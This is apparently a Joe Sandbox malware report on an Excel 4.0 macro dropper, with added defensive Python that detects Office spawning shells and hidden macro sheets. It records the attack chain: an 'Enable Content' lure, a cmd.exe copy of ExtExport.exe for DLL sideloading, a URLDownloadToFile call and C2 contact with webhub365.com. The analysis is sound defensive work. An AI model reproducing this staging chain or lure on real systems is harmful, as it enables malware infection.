
Analysis Report document-47-2637.xls

Overview

General Information

Sample Name:document-47-2637.xls
Analysis ID:432941
MD5:92dcc47a1a044fc3a2328ec6eef3918b
SHA1:6f9266a6c0b702cbaa0a3583df5c8cd1357eae35
SHA256:ac4b99079b1ceb11db593097e421de9d9092765feedc23a3ab8ef912b292c988

Detection

Hidden Macro 4.0
Score: 76 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1204 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2536 cmdline: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • nnAzot.exe (PID: 2380 cmdline: 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7 MD5: 7F7F391491C315A4A72EFCAC0D34FA93)
  • cleanup
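The chain above (EXCEL.EXE starts cmd.exe, cmd.exe copies the signed Microsoft binary ExtExport.exe into a random directory under a new name, EXCEL.EXE then runs that copy with a directory as its first argument) is the evidence behind the Sigma hit and the "Drops PE files" and "Masquerading" entries. ExtExport.exe is a documented LOLBAS binary that loads DLLs from the directory passed as its first argument, and the invocation here (directory plus two arbitrary tokens) matches that documented usage; the report lists no DLL dropped into C:\aZ8ThU0Y\ERdZMUem among the files shown and warns that not all processes were analysed, so the sideloaded payload is not confirmed on this page. The following Python is an added example, not part of the Joe Sandbox report: it replays the process-creation events from the tree (plus one constructed benign control with explorer.exe as parent) and applies the Sigma condition together with two further checks a detection engineer would pair with it. Field names follow the Sigma fields quoted in the report; the environment-variable expansion and the trusted-directory list are assumptions of the example.

```python
"""Added example (not part of the Joe Sandbox report): replay the process
chain from the report over constructed process-creation events and apply
the checks a detection engineer would write for it."""
import ntpath
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
               "msaccess.exe", "mspub.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Assumption: directories a child of an Office process is normally started from.
TRUSTED_ROOTS = (r"c:\program files", r"c:\windows")

# cmd.exe /c copy <src> <dst>, with optional /Y and optional single/double quotes.
COPY_RE = re.compile(
    r"""/c\s+copy\s+(?:/y\s+)?['"]?(?P<src>[^'"]+?)['"]?\s+['"]?(?P<dst>[^'"\s]+)['"]?\s*$""",
    re.IGNORECASE)


def _expand(path):
    """Expand only the two variables seen in the report (assumed values);
    a production pipeline would use the host's real environment."""
    return (path.replace("%ProgramFiles(x86)%", r"C:\Program Files (x86)")
                .replace("%ProgramFiles%", r"C:\Program Files"))


def _name(path):
    return ntpath.basename(_expand(path).strip("'\"")).lower()


def _trusted(path):
    return _expand(path).strip("'\"").lower().startswith(TRUSTED_ROOTS)


def analyse(events):
    """Return (rule, ProcessId) findings in event order."""
    findings = []
    staged = {}  # lower-cased destination of a suspicious copy -> pid of the cmd.exe
    for ev in events:
        parent, child, pid = _name(ev["ParentImage"]), _name(ev["Image"]), ev["ProcessId"]
        # 1. The Sigma rule from the report: an Office product spawning a shell.
        if parent in OFFICE_APPS and child in SHELLS:
            findings.append(("office_spawns_shell", pid))
        # 2. Office starting a binary outside Program Files / Windows.
        if parent in OFFICE_APPS and not _trusted(ev["Image"]):
            findings.append(("office_spawns_untrusted_path", pid))
        # 3. cmd.exe copying a Microsoft binary to a new name or location (LOLBin staging).
        m = COPY_RE.search(ev["CommandLine"]) if child == "cmd.exe" else None
        if m and _trusted(m["src"]) and (not _trusted(m["dst"]) or _name(m["src"]) != _name(m["dst"])):
            findings.append(("system_binary_copied_and_renamed", pid))
            staged[_expand(m["dst"]).lower()] = pid
        # Correlation: a previously staged copy is now executed.
        if _expand(ev["Image"]).lower() in staged:
            findings.append(("staged_binary_executed", pid))
    return findings


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
# Constructed from the report's process tree; the first event is a benign control.
EVENTS = [
    {"ProcessId": 1204, "ParentImage": r"C:\Windows\explorer.exe", "Image": EXCEL,
     "CommandLine": "'" + EXCEL + "' /automation -Embedding"},
    {"ProcessId": 2536, "ParentImage": EXCEL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe"},
    {"ProcessId": 2380, "ParentImage": EXCEL, "Image": r"C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe",
     "CommandLine": r"'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7"},
]

if __name__ == "__main__":
    for rule, pid in analyse(EVENTS):
        print(rule, pid)
```

Run stand-alone it prints four findings: the Sigma match and the renamed-copy finding on PID 2536, then the untrusted-path and staged-binary-executed findings on PID 2380. The correlation rule (a copy destination later appearing as an Image) is the one worth keeping where "Office spawns cmd.exe" on its own is too noisy to alert on.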

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started. Authors: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team. Data:
  • Command / CommandLine / ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
  • CommandLine|base64offset|contains: (empty)
  • Image / NewProcessName / OriginalFileName: C:\Windows\System32\cmd.exe
  • ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  • ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  • ParentProcessId: 1204
  • ProcessId: 2536

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: document-47-2637.xls Virustotal: Detection: 26%
Source: document-47-2637.xls Metadefender: Detection: 22%
Source: document-47-2637.xls ReversingLabs: Detection: 15%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 198.244.146.96:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: Binary string: extexport.pdb source: nnAzot.exe, nnAzot.exe.3.dr
Source: Binary string: extexport.pdb"Oh source: nnAzot.exe, 00000005.00000000.2097222349.00000000003A1000.00000020.00020000.sdmp, nnAzot.exe.3.dr

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Source: global traffic DNS query: name: webhub365.com
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.244.146.96:443
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: unknown DNS traffic detected: queries for: webhub365.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.dr String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing" and then click "Enable Content". 23 24 25 26 27 28 29 30 31 32 33 34 35
Source: Screenshot number: 4 Screenshot OCR: Enable Content". 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 .I lj 38 , Id q p
Found Excel 4.0 Macro with suspicious formulas
Source: document-47-2637.xls Initial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheet
Source: document-47-2637.xls Initial sample: Sheet size: 14533
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe Memory allocated: 76D20000 page execute and read and write
Source: Joe Sandbox View Dropped File: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 022577F47FB074B7D942C8F01DAAC778B110A373DE03B3B5043E887995B09D52
Source: classification engine Classification label: mal76.expl.evad.winXLS@5/14@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\C7DE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD0C6.tmp
Source: document-47-2637.xls OLE indicator, Workbook stream: true
Source: C:\Windows\System32\cmd.exe Console Write: ..................nJ............ . . . . . . . .1. .f.i.l.e.(.s.). .c.o.p.i.e.d..........W.v............P.......(.......6.........nJ.........^..
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: document-47-2637.xls Initial sample: OLE indicators vbamacros = False
Source: document-47-2637.xls Initial sample: OLE indicators encrypted = True
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe Code function: 5_2_003A4F09 push ecx; ret 5_2_003A4F1C
Source: C:\Windows\System32\cmd.exe File created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe Code function: 5_2_003A230E LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_003A230E
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (this entry is repeated 40 times in the report)
Source: document-47-2637.xls Stream path 'Workbook' entropy: 7.97723236264 (max. 8.0)
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe Code function: 5_2_003A4BBA SetUnhandledExceptionFilter,5_2_003A4BBA
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe Code function: 5_2_003A4F4C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_003A4F4C
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe Code function: 5_2_003A4DF8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_003A4DF8
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe Code function: 5_2_003A47E2 GetVersionExA,5_2_003A47E2
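Three of the static findings above describe one mechanism: a CALL formula in an Excel 4.0 (XLM) macro sheet, a hidden macro sheet of 14533 bytes, and a Workbook stream that is both flagged encrypted and at entropy 7.98, i.e. the BIFF records are not readable in the raw file. (The "Document exploit detected" signatures are triggered by the URLDownloadToFileA import and the blacklisted process start, not by a memory-corruption exploit; the OCR'd "Enable Content" lure shows the macro depends on the user.) In BIFF8 the visibility and type of every sheet are recorded in the BOUNDSHEET records of the workbook globals: a two-bit hsState (0 visible, 1 hidden, 2 very hidden, the last not settable from the Excel UI) and a one-byte dt (1 = macro sheet). The Python below is an added example, not part of the report or of any sandbox: it parses those records and flags hidden macro sheets. It runs on a constructed, unencrypted Workbook stream; on a real file you would read the 'Workbook' stream with olefile and, for a sample like this one, decrypt it first (msoffcrypto-tool takes the password with -p; XLM droppers often rely on Excel's silent default password VelvetSweatshop, but this report does not say which password the sample uses, so that is something to try, not a finding).

```python
"""Added example (not part of the Joe Sandbox report): walk the BIFF8 records
of an .xls 'Workbook' stream, list every BOUNDSHEET record and flag Excel 4.0
macro sheets that are hidden or very hidden.  SAMPLE_STREAM is constructed."""
import struct

REC_BOF = 0x0809
REC_BOUNDSHEET8 = 0x0085
REC_EOF = 0x000A
HS_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPE = {0x00: "worksheet", 0x01: "macro sheet", 0x02: "chart", 0x06: "VBA module"}


def iter_records(stream):
    """Yield (record type, record body) for each BIFF record (4-byte header: type, length)."""
    off = 0
    while off + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, off)
        yield rtype, stream[off + 4:off + 4 + rlen]
        off += 4 + rlen


def parse_boundsheet(body):
    """BoundSheet8: lbPlyPos(4) | hsState(2 bits) + reserved(6) + dt(8) | ShortXLUnicodeString."""
    ply_pos, grbit, cch, flags = struct.unpack_from("<IHBB", body, 0)
    raw = body[8:]
    # fHighByte set -> UTF-16LE name, otherwise one byte per character.
    name = raw[:cch * 2].decode("utf-16-le") if flags & 1 else raw[:cch].decode("latin-1")
    dt = (grbit >> 8) & 0xFF
    return {"name": name, "offset": ply_pos,
            "state": HS_STATE.get(grbit & 0x03, "unknown"),
            "type": SHEET_TYPE.get(dt, "unknown(0x%02x)" % dt)}


def list_sheets(stream):
    return [parse_boundsheet(body) for rtype, body in iter_records(stream)
            if rtype == REC_BOUNDSHEET8]


def hidden_macro_sheets(stream):
    """The condition behind a 'hidden Excel 4.0 macro sheet' finding."""
    return [s for s in list_sheets(stream)
            if s["type"] == "macro sheet" and s["state"] != "visible"]


# --- constructed sample stream (not taken from the analysed file) -----------
def _record(rtype, body):
    return struct.pack("<HH", rtype, len(body)) + body


def _boundsheet(name, ply_pos, hs_state, dt, unicode=False):
    encoded = name.encode("utf-16-le") if unicode else name.encode("latin-1")
    body = struct.pack("<IHBB", ply_pos, (dt << 8) | hs_state, len(name), int(unicode))
    return _record(REC_BOUNDSHEET8, body + encoded)


SAMPLE_STREAM = (
    _record(REC_BOF, struct.pack("<HHHHII", 0x0600, 0x0005, 0x0DBB, 0x07CC, 0x000000C9, 0x00000206))
    + _boundsheet("Sheet1", 0x1000, 0, 0x00)                 # visible worksheet (the lure)
    + _boundsheet("Macro1", 0x2000, 2, 0x01, unicode=True)   # very hidden XLM macro sheet
    + _boundsheet("Chart1", 0x3000, 1, 0x02)                 # hidden, but a chart, not a macro
    + _record(REC_EOF, b"")
)

if __name__ == "__main__":
    for sheet in list_sheets(SAMPLE_STREAM):
        print(sheet)
    print("hidden macro sheets:", [s["name"] for s in hidden_macro_sheets(SAMPLE_STREAM)])
```

Only Macro1 is reported: Chart1 is hidden but is not a macro sheet, and Sheet1 is the visible decoy. The lbPlyPos offsets also give you where each sheet's substream starts, which is how a sheet size such as the 14533 bytes above is derived (distance to the next substream).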

MITRE ATT&CK Matrix

Techniques with matched signatures, grouped by tactic (the number after each technique is the match count shown in the matrix; the remaining cells of the original matrix are unmatched template entries):

  • Execution: Command and Scripting Interpreter (1), Scripting (2), Exploitation for Client Execution (23)
  • Persistence: Application Shimming (1)
  • Privilege Escalation: Application Shimming (1), Process Injection (1)
  • Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Process Injection (1), Scripting (2), Obfuscated Files or Information (11)
  • Discovery: System Time Discovery (1), File and Directory Discovery (1), System Information Discovery (4)
  • Command and Control: Encrypted Channel (2), Non-Application Layer Protocol (1), Application Layer Protocol (2)

Behavior Graph


Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

  • document-47-2637.xls: Virustotal 26%
  • document-47-2637.xls: Metadefender 23%
  • document-47-2637.xls: ReversingLabs 15% (label: Document-Office.Trojan.Heuristic)

Dropped Files

  • C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe: Virustotal 0%
  • C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe: Metadefender 2%
  • C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe: ReversingLabs 0%

Unpacked PE Files

No Antivirus matches

Domains

  • webhub365.com: Virustotal 0%

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

  • webhub365.com -> 198.244.146.96 (active: true; malicious: false; reputation: unknown)

Contacted IPs

Public

  • 198.244.146.96 (webhub365.com), United States, ASN 18630 RIDLEYSD-NETUS, malicious: false

General Information

Joe Sandbox Version:32.0.0 Black Diamond
Analysis ID:432941
Start date:11.06.2021
Start time:00:00:08
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 43s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:document-47-2637.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal76.expl.evad.winXLS@5/14@1/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 88.6%)
  • Quality average: 72.3%
  • Quality standard deviation: 34.5%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 192.35.177.64, 67.26.17.254, 8.238.28.126, 8.238.36.254, 8.238.85.126, 8.241.78.126
  • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net
  • Not all processes were analyzed; the report is missing behavior information
  • Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

  • 198.244.146.96: document-47-2637.xls (malicious); document-47-2637.xls (malicious)

Domains

  • webhub365.com: document-47-2637.xls (malicious); context IP 198.244.146.96

ASN

  • RIDLEYSD-NETUS: document-47-2637.xls (malicious), 198.244.146.96; document-47-2637.xls (malicious), 198.244.146.96

JA3 Fingerprints

  • 7dcce5b76c8b17472d024758970a406b, previously seen with the following samples (each flagged malicious, each listed with context IP 198.244.146.96): document-47-2637.xls; ManyToOneMailMerge Ver 18.2.dotm; WV Northern Community College.docx; Tax Folder.doc; 51564.docx; f.xls; P.I-84514.doc; P.I-84512.doc; swift_euro.docx; xTnb7uPpSb.xls; Y8bVoElk4Y.xls; xTnb7uPpSb.xls; statistic-608048546.xls; 212161C3EFE82736FA483FC9E168CE71#U007eC2#U007e1B6B2C73#U007e00#U007e1.xlsx; cryptowall.exe; invoice-H9247.docx; T3ZhUk5pyO.xls; Invoice.xlsm; Prudential Investment Services.doc; Donation Receipt 36561536.doc

Dropped Files

  • C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe: document-47-2637.xls (malicious); document-37-1849.xls (malicious)

Created / dropped Files

          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Microsoft Cabinet archive data, 60080 bytes, 1 file
          Category:dropped
          Size (bytes):60080
          Entropy (8bit):7.995256720209506
          Encrypted:true
          SSDEEP:768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4
          MD5:6045BACCF49E1EBA0E674945311A06E6
          SHA1:379C6234849EECEDE26FAD192C2EE59E0F0221CB
          SHA-256:65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58
          SHA-512:DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: MSCF............,...................I........d.........R9b .authroot.stl.3..).4..CK..8T....c_.d....A.K...].M$[v.4.)7-.%.QIR..$t)Kd.-[..T\{..ne.....{..<.......Ab.<..X....sb.....e........dbu.3...0........X..00&Z....C...p0.}..2..0m.}..Cj.9U..J.j.Y...#.L..\X..O.,...,.qu..]..(B.nE~Q...)..Gcx.....}...f....zw.a..9+[.<0.'..2 .s..ya..J......wd....OO!.s....`.WA...F6._f....6...g..2..7.$,....X.k..&...E...g.....>uv."..!......xc......C..?....P0$.Y..?u....Z0.g3.>W0&.y.(....].`>... ..R.q..wg*X......qB!.B....Z.4..>.R.M..0.8...=.8..Ya.s.......add..)..w.4.&.z...2.&74.5]..w.j.._iK..||[.w.M.!<-.}%.C<tDX5\s._..I..*..nb.....GCQ.V..r..Y.............q...0..V)Tu>.Z..r...I...<.R{Ac..x^. .<A........|.{.....Q...&....X..C$....e9.:..vI..x.R4...L......%g...<..}'{....E8Sl...E".h...*.........ItVs.K......3.9.l..`D..e.i`....y...,..5....aSs`..W...d...t.J..]....'u3..d]7..=e....[R!:........Q.%..@........ga.v.~..q....{.!N.b]x..Zx.../;#}.f.)k.c9..{rmPt..z5.m=..q..%.D#<+Ex....1|.._F.
          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):893
          Entropy (8bit):7.366016576663508
          Encrypted:false
          SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
          MD5:D4AE187B4574036C2D76B6DF8A8C1A30
          SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
          SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
          SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
          Malicious:false
          Reputation:high, very likely benign file
          Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):328
          Entropy (8bit):3.1225789902305854
          Encrypted:false
          SSDEEP:6:kKLgNie8N+SkQlPlEGYRMY9z+4KlDA3RUeWlK1MMx:D78kPlE99SNxAhUe3OMx
          MD5:9332649BE2B7EEB84D2A51B4FCB8C610
          SHA1:EC5B37F58C8810F61A0978167001D6CAEE4CF14D
          SHA-256:B818B209B0885F643CECD70C1447B3D3C4547F7C7D2884195D19E2AFFC81A42D
          SHA-512:EB42861F3768F3B86281BBDB86702AA552E46F6CD4B38C215545ADFF820B905ED61B45B40C49B8B97EBF65462F796DA4EE5707F3B241CD24F9033858DA8AA2BE
          Malicious:false
          Reputation:low
          Preview: p...... ..........r~.^..(....................................................... ............L......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.0.e.6.c.f.e.3.4.c.d.7.1.:.0."...
          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):252
          Entropy (8bit):3.0169823334697616
          Encrypted:false
          SSDEEP:3:kkFkluAVfllXlE/JADkdllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1yWJ/fdl/:kKWYADk5liBAIdQZV7QWB
          MD5:5604964BDBEBD78FC30DCCFE0D288FBC
          SHA1:CFB823EC2DC190DB7B1B6273EA727DBE29968A9D
          SHA-256:B7C960629B8D092922FC3F8FAEEC71203CA8F0576026D3167745439AA3108D72
          SHA-512:1499517A5F36BBFE8FE8D4460FCD94564DD6DD53610207A9B715F81BDC504CE306E65246668BABAEC6C3694D300CFBBB4DFAEE48E21E43EE8194083EE2A0F5E8
          Malicious:false
          Reputation:low
          Preview: p...... ....`... G0~.^..(....................................................... .........e..S......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.c.3.6.7.2.e.8.3.f.1.4.0."...
          C:\Users\user\AppData\Local\Temp\CabE004.tmp
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Microsoft Cabinet archive data, 60080 bytes, 1 file
          Category:dropped
          Size (bytes):60080
          Entropy (8bit):7.995256720209506
          Encrypted:true
          SSDEEP:768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4
          MD5:6045BACCF49E1EBA0E674945311A06E6
          SHA1:379C6234849EECEDE26FAD192C2EE59E0F0221CB
          SHA-256:65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58
          SHA-512:DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB
          Malicious:false
          Reputation:moderate, very likely benign file
